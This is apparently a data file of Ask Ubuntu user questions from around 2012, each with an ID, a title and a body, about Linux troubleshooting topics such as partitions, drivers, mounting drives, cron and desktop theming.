177800	how to redirect single audio channels to different devices ?	i just bought a bluetooth stereo speaker and i had an idea : is it possible to build a 4.0 audio system using my bluetooth speakers as rear speaker and two normal cabled stereo speakers ( or another pair of bluetooth speakers ) as front ? which program i have to use ? in general : is it possible to split a 4.0 or 5.1 signal in the single channels and send them to multiple devices ?
177802	how to choose the fastest mirror in server ?	i know how to choose best server for my ubuntu system . but , how we can choose a best server to our location in ubuntu server where there is no gui ?
177803	can i format my windows 7 ntfs partition and use it in ubuntu even if it appears earlier on disk ?	i have installed and working windows 7 and ubuntu 12.04 . i discovered that i do not need all this space that i have assigned to my d : \ drive in windows and now would like to include it as a partition in ubuntu . a friend told me that if i have first installed windows and then ubuntu , then the order of the disks does not favor such a move and that i must just format it and auto-mount it in ubuntu . here is my partition table : /dev/sda /dev/sda1 ntfs 209715 mb ( c : / drive with windows installation ) /dev/sda2 ntfs 268928 mb ( d : / drive that i would like now to use in ubuntu ) /dev/sda5 ext4 100000 mb ( ubuntu root / ) /dev/sda7 ext4 162467 mb ( ubuntu home /home ) /dev/sda6 swap 9034 mb ( swap partition ) here is what i am planning to do but am so scared to break anything . i booted with the 12.04 live usb and chose `` something else '' ( 3rd option after `` erase ubuntu 12.04.1 lts and reinstall '' and `` erase everything and reinstall '' ) . then i plan to select /dev/sda2 then click on `` change '' . in the dialog box , i plan to select ext4 , to tick the format checkbox and to choose mount point to be the root / . am i creating a disaster ? please advise .
177814	i ca n't update wine from 1.5.10 to 1.5.11 due to a dpkg lock file	i have tried double checking for updates and updating the ppa via the terminal . the terminal outputs this , at the end . e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? any ideas ? thank you .
177818	crontab run script	for example i want to schedule task using crontab : */2 * * * * /root/scripts/backup.sh but nothing happens , backup.sh is not executed . who can help me ?
177820	installing ubuntu on macbook pro 9,1	i bought a macbook pro 9,1 ( mid 2012 , 15inch , not retina ) . can anyone tell me how to install ubuntu 12.04 on it ? i already have windows installed via bootcamp . also , where to install drivers for ubuntu and all ? this link https : //help.ubuntu.com/community/macbookpro has nothing for 9,1 so please help me . if i have to remove bootcamp and reinstall windows manually because bootcamp does n't allow resizing of partitions , that 's fine . please tell me how to install precise on mbp 9,1 thanks !
177824	remapping caps lock to control and escape ( not the usual way )	i know how to use xmodmap to remap the caps lock key so it acts as a control key , or as an escape key . i would like to combine both features as follows : when i push , then release , the caps lock key , it sends escape . when i hold down caps lock and push another key ( say a ) , it send control-a . is there some combination of xkb , xmodmap and something else that could make caps lock behave this way in x ? i 'm using ubuntu precise on a macbook air 3,1 .
177825	how to mount an external hdd ?	i have ubuntu linux 12.04 version the latest right now.i want to mount an external hdd ntfs 1tb.i have followed many guides but still no success.the error i 'm getting is this : failed to read last sector ( 1953523119 ) : invalid argument hints : either the volume is a raid/ldm but it was n't setup yet , or it was not setup correctly ( e.g . by not using mdadm -- build ... ) , or a wrong device is tried to be mounted , or the partition table is corrupt ( partition is smaller than ntfs ) , or the ntfs boot sector is corrupt ( ntfs size is not valid ) . failed to mount '/dev/sdb1 ' : invalid argument the device '/dev/sdb1 ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? using storage device manager i get this error : error mounting : mount exited with exit code 1 : helper failed with : mount : only root can mount /dev/sdb1 on /media/skliros_diskos { external disk name } when i use sudo fdisk -l , this is the output : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000e0bc6 device boot start end blocks id system /dev/sda1 * 2048 618854399 309426176 83 linux /dev/sda2 618856446 625141759 3142657 5 extended /dev/sda5 618856448 625141759 3142656 82 linux swap / solaris disk /dev/sdb : 1000.2 gb , 1000202043392 bytes 255 heads , 63 sectors/track , 121600 cylinders , total 1953519616 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0002093a device boot start end blocks id system /dev/sdb1 2048 1953525167 976761560 7 hpfs/ntfs/exfat
177829	usb stick made with unetbootin missing bootmgr .	i downloaded 12.04 32-bit iso and am trying to make a usb stick with it for me to boot from and install on my hd . i followed the instructions in unetbootin but my usb stick is missing its bootmgr so it wo n't boot . any advice ? i do n't have a cd-burner nor a cd-rom on my laptop which i am trying to install on .
177831	why ca n't i select the folder to send to the cloud for sync ?	a message says i am limited to syncing folders in c : \my documents\ . do i understand this correctly ? if so , it looks like a stupid design decision to me .
177834	how do i set a fallback for a gtk+ theme ?	i was looking for a way to apply a custom gtk3 theme on a per application basis like can be done with gtk2 but it appears it ca n't be done as there are open questions here that have not been resolved . with that being the case , i was searching for a way to set the fallback/default gtk3 theme that the system uses when a gtk2 theme wo n't work . i am running nox/ecstacia gtk2 theme but it fails to theme quite a few apps , ( evence , transmission , etc.. ) as well as some core apps in my xubuntu 12.04 install like software center . since nox is a dark theme , i would like to use a dark gtk3 theme as the fallback like blapple or marples . is this possible ?
177837	starting a background application automatically on boot	i can run the following command in a terminal sudo /usr/sbin/archttp64 81 which is a management console for the raid controller on this machine . then i can run firefox and use the address : localhost:81 and log into the console and manage my raid set . i do n't want to have to do this every time i want to check in on my raid set , plus , unless the utility is running i wo n't receive status emails if there is an issue . i 've tried using the `` startup applications '' and add an additional startup program , but its not working properly or more likely i 've got something mis-configured . my info in edit startup program : name : areca archttp utility command : /usr/sbin/archttp64 81 comment : any ideas ?
177838	how to change oxygen window decorator ?	i am using kubuntu 12.04 and kde 4.9 and i would like to make some custom theming . i have made some changes in my color scheme and icons and now i would like to make changes into window decoration in order to match . although there are quite a lot of downloadable window decorators via system settings > workspace appearance > window decorations , i have to admit that i did n't find any with so many configuration options nor appearence as default 's oxygen . however , oxygen default 's color ( light grey ) do not match with my new color set , so i would like to know if it possible to change its colors . i have tried with several scheme colors with no success ( system settings - > application appearance - > colors - > colors tab - > color set : window - > change normal background ) . although they do change window 's titles color 's background in other windows decorators , oxygen ignores that configuration . i am wondering why , since it 's supposed to be very customizable and multi-purpose . is there any way to achieve this ?
177842	`` bcm4313 wireless card not detected unless i boot with an ethernet connection ``	*my ubuntu 12.04 lts does not detect any wireless network unless i reboot with the ethernet connected . with ethernet connection , both the wifi and ethernet are detected and , even if i remove the cable , wifi keeps working . however , each time , i am having to boot my laptop with the lan connected to be able to use wlan . here is my hardware configuration . well i posted this post about a day ago and today , i just uninstalled all the broadcom drivers etc ... and there without any drivers installed the wireless runs perfectly ! ! ! what 's that all about ?
177847	kickoff and krunner to search with less than 3 chars in search field ?	both krunner and kickoff in kubuntu return a list of found items after the user has entered at least three characters in the search field . usage on synapse shows that returning a list after one character onwards is faster and efficient . i would like kickoff and krunner to behave similarly , by making the return a list of items after entering the first character in their search field . how can i achieve that ?
177851	can i make just gimp use a dark theme ?	when doing color work with photos it can be useful to have a dark background and gui elements . several photo editing applications provide this natively : i 've seen screenshots of gimp with a dark color theme that approximates this effect : can i make gimp look like this without affecting other applications ?
177856	how can i install gcc 3.3 , g++ 3.3 , cpp 3.3 ?	i am trying to follow the directions for installing the dyna language in ubuntu , here : http : //dyna.org/wiki/index.php ? title=download however , this requires installing very old versions of gcc , g++ , and cpp . these versions no longer appear in the ubuntu repositories . is there a repository i should add to get older versions of the software ? or is there a better way to get these packages ?
177858	hp dv6 connects but no internet	i have a hewlett packard dv6 . i connected to the access point . i receive an ip address/default gateway/dns , etc ( dhcp ) . i can not ping my gateway . dns lookups fails . there is just no connectivity . my driver is listed as being iwlwifi . an lspci shows my card to be a realtek rtl8101e/rtl8102e . i ca n't ping myself from another computer . eth0 link encap : ethernet hwaddr c8:0a : a9:0c : a7:45 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:41 base address:0xe000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:561 errors:0 dropped:0 overruns:0 frame:0 tx packets:561 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:42164 ( 42.1 kb ) tx bytes:42164 ( 42.1 kb ) wlan0 link encap : ethernet hwaddr 00:26 : c7:04:97 : c0 inet addr:192.168.1.109 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :226 : c7ff : fe04:97c0/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:12 errors:0 dropped:0 overruns:0 frame:0 tx packets:71 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2035 ( 2.0 kb ) tx bytes:12371 ( 12.3 kb )
177859	how to get touchpad working again on an asus k53br ?	this post was originally in danish . check post revisions . i 've had ubuntu installed 12.04 for 3 days now . my touchpad worked fine right for 20 minutes after which it just stopped working for no reason ? i 'm using an asus k53br model . so how do i get it working again ?
177861	fstab automount smb fails	i 'm trying to automount some drives with smb with fstab entries as such . # auto mount hda shares //hda/deannasdocs /home/deanna/deannasserverdocs cifs user=deanna , pasword=** 0 0 //hda/music /home/deanna/servermusic cifs user=deanna , pasword=** 0 0 //hda/pictures /home/deanna/serverphotos cifs user=deanna , pasword=** 0 0 if i click on one of these drives i get an error `` only root can mount '' if i manually mount with sudo mount -a i 'm prompted for a password and they mount just fine . what the heck is going on here ? answer : of course it was something stupid . i copied the syntax for the mount from offline and it has `` pasword '' instead of `` password '' . it stood out initially but i thought it was just a unix foible .
177869	how do you configure ubuntu to run only with tor	i have a problem . i 'm trying to port forward and get a similar error msg , i type this in : ssh -n -l 9050:10.0.2.2:9050 root @ 10.0.3.1 and then i get this msg : ssh : connect to host 10.0.3.1 port 22 : no route to host . i 've been googling around a couple of days and i ca n't seem to find anything that directly relates to this , i 'm also a noob so there could be something sitting right in front of my face lol . either way i came across this post and thought i 'd drop a line , i hope someone out there can help , thanks in advance !
177878	quickly , treeview and treestore , entry text not showing	if i append entries to treestore , i can see that the entries are there , but i can not see any of the text for those entries . i do not know if i have to add a repaint or something , or if i should link the treestore columns to the treeview columns some way . the problem ( no text is displayed ) : columns added to treeview : and the code i added to add entries to the tree : # code for other initialization actions should be added here . treestore = self.builder.get_object ( `` treestore1 '' ) root = treestore.append ( none , [ `` from_test1 '' , '' to_test1 '' ] ) treestore.append ( root , [ `` from_test2 '' , '' to_test2 '' ] )
177882	shrinking file system taking a lot of time , normal ?	i 'm using gparted to shrink the partition on my 500 gb external hard drive to a 220 gb partition . it contains about 210 gb of data . i 'm shrinking it to convert fat32 to ext2 . it has been almost an hour . my hard disk heats up so i have continuous ventilation to keep it cool . is this lengthy time taken by gparted normal ? if not , then how do i safely disconnect it ? i do n't mind losing the data , but the hard disk is really important . any suggestions ? also , will running the hard disk for such long hours harmful ?
177883	can someone please compare the safety issues between ubuntu and windows os ?	i am a new user . i installed this on and older pc using xp . can someone please compare the safety issues between ubuntu and windows os . in other words , am i much safer on the web with ubuntu >
177889	installing 12.04 onto a dell studio with windows 7 drops to grub rescue prompt	trying to install 12.04 on my brother 's dell studio 1535 laptop with windows 7 ultimate already on it . after i tell the bios to boot usb , it tells me error : no such device : 51d55cfe-ca94-40b7-8d22-180e1a1f9762 grub rescue > and i can type in stuff . i used the same usb 5 minutes earlier to install 12.04 on my ibm lenovo z61m perfectly . so the usb is flashed right . any suggestions ?
177893	not able to play online music	i have installed 12.04 in windows 7 as dual boot . now i am not able to play any music from online music sites like smashhitsusa.com or saavn.com or songspk.pk . whenever i click on any song , it just stuck in the same condition , neither showing any error like plugin required or missing nor playing the song . ubuntu-restricted-extras are also installed . still not able to play . could you please help me to solve the issue ?
177894	how to show an application icon in the notification bubble ?	i 'm trying to integrate my app with ubuntu notification system . it works ok , but i do n't know how to show my icon in the bubble . my code looks something like : notification = notify.notification.new ( `` title '' , `` some text here '' , `` /data/media/my-app-icon.svg '' ) notification.show ( ) unfortunately only text is visible .
177897	how heavy is wine on my system ?	i am looking to use a good download manager on ubuntu 12.04 i have tried some such as multiget etc but really none of the in my view compare up to orbit downloader which works perfectly under wine . i want my download manager to always be running ( i download a lot ) so i am concerned as to how much resources wine actually uses ?
177898	how do i share usb vfat drive with other users ?	i want to share pictures between my wife and me , on an external usb drive . the os is ubuntu 12.04 . the drive is a western digital 500 gb and sudo blkid /dev/sdc1 return label= '' my book '' uuid= '' 9389-61cd '' typ= '' vfat '' ls -l /media return drwx -- -- -- ted ted 32768 dec 31 1969 my book ( ted is my account , and the account used to install ubuntu 11.10 , and upgrade to 12.04 ) i want the access to be open to , at least , a common group , so preferred is drwxrwxrwx this should automatically mount this way .
177904	sources missing in /etc/apt/sources.list , how do i get them back ?	somehow my ubuntu install ca n't find what i believe to be very common packages ... . e : unable to locate package php5-curl e : unable to locate package php5-gd i know this has something to do with my sources , however , i am not sure which source i need or which source these packages would be included in . these are the commands i ran sudo apt-get install php5-curl sudo apt-get install php5-gd here 's the content of /etc/apt/sources.list : # deb cdrom : [ ubuntu 11.10 _oneiric ocelot_ - release amd64 ( 20111012 ) ] / dists/oneiric/main/binary-i386/ # deb cdrom : [ ubuntu 11.10 _oneiric ocelot_ - release amd64 ( 20111012 ) ] / oneiric main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . # # major bug fix updates produced after the final release of the # # distribution . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu oneiric partner # deb-src http : //archive.canonical.com/ubuntu oneiric partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # deb http : //extras.ubuntu.com/ubuntu oneiric main # deb-src http : //extras.ubuntu.com/ubuntu oneiric main # deb http : //repository.spotify.com stable non-free
177909	restore gtk integration after removing kde	i was trying kde ( kubuntu-desktop ) on top of an ubuntu unity install . now i have uninstalled kde . however , i see that any non-gtk based application still showing the kde theme . for example , below is a screenshot of the right-click menu of nautilus : below is a the right-click menu of the chromium browser , which looks like it is still retaining the kde theme : how do i get rid of that kde theme ? i have already removed the .kde folder , and .fonts.conf file and purged all kde packages . procedure of kubuntu removal sudo apt-get remove -- purge plasma ? kubuntu ? sudo apt-get autoremove -- purge
177916	why do my displays settings show up as `` laptop '' after installing nvidia drivers ?	why does the displays setting in ubuntu 12.04 show my displays as `` laptop '' after i have installed the recommended nvidia drivers for my gtx460 ? is this normal and my displays need to be set up using the nvidia software ?
177918	ubuntu 12.04 virtual box not reading disk ?	i apologize if this has been asked , i could n't find it . i 'm running ubuntu 12.04 , and i have a virtualbox vm that starts headless when the machine boots up . for some reason , when it first tries to run , virtualbox complains that it 's ca n't find the virtual disk ( which is on another drive ) - once i open the directory manually , i can run the vm and everything is fine . why does n't ubuntu see the other drive at first ? has anyone encountered this ?
177920	why does n't unity 3d work ?	i have a small problem . i have an asus with a nvidia gt630m k55vm and i want to install ubuntu from a usb . i select try without installing , and it works perfectly with the effects of unity 3d mode , but when i install and run ubuntu on the system , it does n't work in 3d mode . it starts up in 2d mode and the effects do not appear . what could i have done wrong ? thanks for the answer . there is no driver available . but i do n't understand why if it works well on the live cd , it does n't work when ubuntu is completly installed . thank you very much !
177921	what 's a screenshot application which will auto-upload to imgur ?	is there an equivalent to imgur on ubuntu ? i am looking for an application that has the simple workflow of : taking a screenshot . having it auto-upload in the click of a button .
177924	how can i make flash work with my webcam ?	i 've installed and re-installed flash many times on my laptop ( philco 14d-p744lm ) when i use a website that uses the webcam in flash , for example , chatroulette or omegle , and i click on `` allow '' to allow my webcam to turn on , it does n't do anything . this does not happen in windows 7 . what do i need to install/use to make my laptop webcam work with flash ? the problem is not with my webcam because i can use webcam perfectly fine on skype ! i 'm on ubuntu 12.04 lts
177928	laptop fan not turning on at all	i installed 12.04 64-bit onto my hp dv7 3063cl and completely removed windows 7 . when i had windows 7 the fan worked , but once the ubuntu installation was complete it doesnât even turn on during the boot process . in the bios the fan is set to always on and that is the only setting regarding the fan . i currently have a sensor installed on the machine to watch the temperature as i work on the machine with a little fan under it , but what can i do to get the fan working ?
177929	no `` place windows '' option in ccsm ?	i ca n't find the place windows option in ccsm . do i have to download something ? i am using ubuntu 12.04 . edit : solved . found it by typing `` place '' in the search bar .
177930	radeon drivers & ubuntu 12.0.4	only installed ubuntu ( and any linux ) for the first time yesterday and am having , what i think is , a bit of trouble with my graphics card ( radeon 4800 series ) the machine is capable of running steam and the games i had running for it as a windows xp pc ( specifically total war ) but now i find it struggles even to run total war smoothly on the lowest possible graphics settings . `` additional drivers '' says that i need the `` ati/amd proprietary fglrx graphics driver ( post-release updates ) '' but when i go to install them i get : sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log now , yesterday it had both that driver and another one without the post-release updates on it and something that i have tried in the last 24 hours has eliminated that `` other '' one leaving only the post-release driver option , but it has n't fixed the problems i am having in-game . i also have installed the catalyst controls which seems to give me the proper information about the card and lets me control the settings ccc allows you to control , but my problems persist . my knowledge of terminal is limited and i tried many things yesterday , i guess what i am wondering is first , if there is something i can do to check that the card is indeed up-to-date and running properly so i can determine if the problem lies elsewhere . i apologize for my ignorance , i know this an often asked question but i 've tried a lot and am just stone-walling . thanks !
177934	how to make work indicator-chars app ?	i downloaded indicator-char and unzipped the files . i added the characters there i wanted perfectly . when i run the python script it loads the daemon and i can see this characters . but the problem is that when i click on them , the app does n't copy anything to the clipboard . the following code belongs to the copy function of the program : def on_char_click ( self , widget , char ) : cb = gtk.clipboard ( selection= '' primary '' ) cb.set_text ( char ) is a syntax problem ? there is a problem on my system ?
177935	is there an ubuntu alternative to iexplorer ( formerly iphone explorer ) ?	i 'm trying to view the entire contents of my iphone in ubuntu 10.04 . i 'm able to mount and view the digital media folders , but i 'm looking for behavior more like the mac/windows iexplorer app that will list the /var folder as well as applications , etc rather than just making it look like an external filesystem . i 've found a few options that require jailbreak but i 'd rather not go that route if it 's at all possible . thanks !
177937	how to change login screen resolution ?	ok so i have a tv set up as my monitor but with ubuntu i came across a problem my log in screen is a different resolution than that rest of ubuntu . this would n't be a problem if it was n't for my tv does n't support the log in screens resolution that its set to and so i am unable to log in unless i switch my smaller computer monitor that supports its resolution . so is their anyway for me to change the log in screen resolution to something my tv supports .
177941	ubuntu apt-get bricked , what should i do ? ( from so )	somehow my ubuntu install ca n't find what i believe to be very common packages ... . e : unable to locate package php5-curl e : unable to locate package php5-gd i know this has something to do with my sources , however , i am not sure which source i need or which source these packages would be included in . any ideas ? edit : these are the commands i ran sudo apt-get install php5-curl sudo apt-get install php5-gd edit : i asked on askubuntu , thank you for the suggestion
177942	nothing works on the desktop screen after i tried to use the 3d cube settings	i am pretty new to 11.10 . i was trying out some settings to operate the desktop in 3d cube mode that 's when the unity bar , side bar disappeared . i have tried quite a few things to get it up and running but now even my terminal does not work with the shortcuts on the desktop . can someone please help me with what i need to do to resolve this conflict ? where do i begin ?
177947	no wired or wireless connection on a dell precision m4300	let me start off by saying that i 've been working on this for 6 hours , researching everywhere i can find online and not finding a solution . i just installed ubuntu 12.4 lts and replaced windows xp on my dell precision m4300 . the installation went smooth , however now that it 's installed i 'm unable to get any type of internet connection ; wired or wireless . i 've tried plugging directly into the modem , but the `` wired icon '' in the status bar constantly searches for a connection , disconnects , and instantly retries ; non-stop . it never connects . i 'm able to get a `` connection '' if i change the ipv4 connection settings to `` shared '' rather than auto , but it will not connect to the internet , it simply says that it 's connected . i 'm assuming that it has something to do with missing drivers ( broadcom maybe ? ) . i 've been all over the web but can not find an answer . please help get me on the right path . i 'm fine replying to 15,000 comments to my question as long as i get one good answer out of it ! thanks !
177948	partition table error . i have the `` fdisk -l '' info	i have my computer with both w7 and ubuntu for quite a while now . i had made the partitions with easeus partition manager and no problem there . i 've grown fond of ubuntu and wanted to allocate it more space . so with easus partition manager i resized my w7 partitions and turned them to unallocated space . when i re-started i got the grub error `` unkown filesystem '' , but i was able to repair it with boot-repair . i am now able to boot again into both oss , but my swap partition is `` not available '' in system monitor and gparted and kpm ca n't find my filesystems . my fdisk -l is this : disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xcc1175bb device boot start end blocks id system /dev/sda1 2048 3074047 1536000 27 hidden ntfs winre /dev/sda2 * 3074048 55745549 26335751 7 hpfs/ntfs/exfat /dev/sda3 55745552 97787654 21021051+ 7 hpfs/ntfs/exfat /dev/sda4 269613055 312580095 21483520+ f w95 ext 'd ( lba ) /dev/sda5 269613056 308674559 19530752 83 linux /dev/sda6 308674560 312580095 1952768 82 linux swap / solaris mount : /dev/sda5 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) /home/david/.private on /home/david type ecryptfs ( ecryptfs_check_dev_ruid , ecryptfs_cipher=aes , ecryptfs_key_bytes=16 , ecryptfs_unlink_sigs , ecryptfs_sig=2e10788bc7a3aea4 , ecryptfs_fnek_sig=97c48f7ea38b799b ) gvfs-fuse-daemon on /home/david/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=david ) cat /etc/fstab : # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda6 during installation uuid=bd246bec-aa85-4b8e-84ec-dd2fa23a5dda / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation # uuid=bf8a85b1-f5ed-44f9-82a2-985ed51e06be none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 sudo blkid : /dev/sda1 : label= '' toshiba system volume '' uuid= '' 94d45be5d45bc7de '' type= '' ntfs '' /dev/sda2 : uuid= '' 3c7452e57452a206 '' type= '' ntfs '' /dev/sda3 : label= '' documents & apps '' uuid= '' 01cc7a1011e57ea0 '' type= '' ntfs '' /dev/sda5 : uuid= '' bd246bec-aa85-4b8e-84ec-dd2fa23a5dda '' type= '' ext4 '' @ john s gruber : i did not move swap partition . i only resized two primary partitions ; one has the w7 os , the other my w7 user info ( my documents , etc ) . my fourth primary partition ( which easeuspm could see but not modify ) has two logical partitions : one is for all ubuntu , the other swap . note : `` swap '' ( as any other partition ) do not show up in gparted ( or kpm ) at all . so no right click option is possible . output of sudo parted -l : david @ daveslapu : ~ $ sudo parted -l error : unable to satisfy all constraints on the partition . david @ daveslapu : ~ $ output of cat /etc/crypttab : david @ daveslapu : ~ $ cat /etc/crypttab # < target name > < source device > < key file > < options > cryptswap1 /dev/sda5 /dev/urandom swap , cipher=aes-cbc-essiv : sha256 david @ daveslapu : ~ $ @ john s gruber : i do n't really know if i want it encrypted or not . i guess since it has non important data it could be non encrypted . if there is a notable advantage then maybe encryption would be better . which do you recommend ? ( the focus of this machine is speed and performance though , so think about that for your advice . ) thank you . thanks for all the responses guys .
177951	input/output error when updating libreoffice	i am having problems installing the libreoffice-help-en-us update . details gives me this : dpkg-deb ( subprocess ) : failed to read on buffer copy for failed to write to pipe in copy : input/output error dpkg-deb ( subprocess ) : data : internal bzip2 read error : 'unexpected_eof'
177953	why do my hardrives change dev links ?	with every boot my hdds randomly change places , as in sometimes my root partition is on sda , while other times it books on sdb.its really not bothersome as i use uuid for fstab and such , but its really just annoying . does anybody know if there is a way to keep it from changing ? i am using an ide drive and a sata drive .
177958	unable to connect with wired connection in 12.04	i am having a problem connecting to wired connection from router . i used to have 11.10 where i tried to establish dsl connection . i tried it doing through the terminal using some pppoeconf commands . when i reboot my system , under the ubuntu loading sign , i saw messages like configuring network ; wait 60 seconds more for connection , etc . then after 2-3 minutes , ubuntu home screen appears . when i tried to connect with my wired connection , it always says disconnected even if there is a wired connection . then i went to network and tried to connect from there , but i was unable to do so . the wired connection button turns off . this problem did n't get solved and i also could n't find a way to undo the settings done from the terminal , so i formatted 11.10 and installed 12.04 but still , the same problem arose .
177960	how do i get 1366x768 resolution with dual graphics card ati madison radeon hd 5000m series and intel integrated graphics controller	i am on an hp envy 14 , and the proper resolution that i should be using is 1366x768 . this is not an option and i am stuck on 1024x768 . i am using linux 12.04. lspci | grep vga : 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati madison [ radeon hd 5000m series ] i 've tried to add the resolution as a mode in xorg.conf but that does not work . please any help would be appreciated . i 'm new to linux and just got my dual boot working but this resolution issue is killing me . i just tried using the xrandr command : xrandr -- newmode `` 1368x768_60.00 '' 85.25 1368 1440 1576 1784 768 771 781 798 -hsync +vsync but i get an error : xrandr : failed to get size of gamma for output default lsmod returns the following : module size used by vesafb 13844 1 rfcomm 47604 12 bnep 18281 2 parport_pc 32866 0 ppdev 17113 0 snd_hda_codec_hdmi 32474 1 arc4 12529 2 joydev 17693 0 hid_logitech_dj 18594 0 i915 472941 5 uvcvideo 72627 0 usbhid 47199 1 hid_logitech_dj hid 99559 2 hid_logitech_dj , usbhid psmouse 87692 0 iwlwifi 332525 0 mac80211 506816 1 iwlwifi videodev 98259 1 uvcvideo snd_hda_codec_idt 70795 1 mei 41616 0 btusb 18288 2 v4l2_compat_ioctl32 17128 1 videodev hp_accel 25976 0 lis3lv02d 19876 1 hp_accel hp_wmi 18092 0 sparse_keymap 13890 1 hp_wmi input_polldev 13896 1 lis3lv02d drm_kms_helper 46978 1 i915 drm 242038 2 i915 , drm_kms_helper i2c_algo_bit 13423 1 i915 serio_raw 13211 0 snd_hda_intel 33773 5 snd_hda_codec 127706 3 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel snd_hwdep 13668 1 snd_hda_codec bluetooth 180104 23 rfcomm , bnep , btusb cfg80211 205544 2 iwlwifi , mac80211 snd_pcm 97188 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec mac_hid 13253 0 snd_seq_midi 13324 0 snd_rawmidi 30748 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61896 2 snd_seq_midi , snd_seq_midi_event fglrx 3263886 0 snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq snd 78855 20 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_ra wmidi , snd_seq , snd_timer , snd_seq_device wmi 19256 1 hp_wmi video 19596 1 i915 intel_ips 18174 0 soundcore 15091 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm lp 17799 0 parport 46562 3 parport_pc , ppdev , lp r8169 62099 0 i have installed ati/amd proprietary fglrx graphics driver . but there is another one called ati/amd proprietary fglrx graphics driver ( post-release updates ) which i have trouble installing because it gives me an error and tells me to look at some sort of jockey log .
177961	it is taking a long time to start my system from the setup cd	i reformatted my laptop 's hard drive because my windows xp installation was damaged , and now i am trying to boot from the cd and install 11.10 , but the installation just wo n't start . i have a 2.4 ghz intel celeron single core processor and 240 mb of ram , and a 40 gb hard drive in the system i want to use ubuntu on , it is a toshiba sattelite a15 . are those requirements strong enough or no ?
177964	can i get rid of alt f2 run command from dash ?	is there a way to have the alt f2 run command prompt not open from the dash ? instead , it it 's own window like in fallback gnome ?
177970	how to merge two ubuntu one accounts ?	i created a ubuntu one account long time ago , recently , forgetting that , i created another ubuntu one account using a different email address . as a result , i have two set of synced folders and both are different . is there a way i can merge both ? thanks , akshay
177971	how can i set up a php script to run via cron ?	how can i set up a php script to run via cron i 've created a file in the cron.d folder with the username as the file name : /etc/cron.d/username inside of username file i placed the following cron command 0,30 * * * * username /home/username/public_html/cron.php i 'm actually trying to get the cron working for open atrium however upon checking open atrium status it shows no signs of the cron file being run . any help on this would be greate
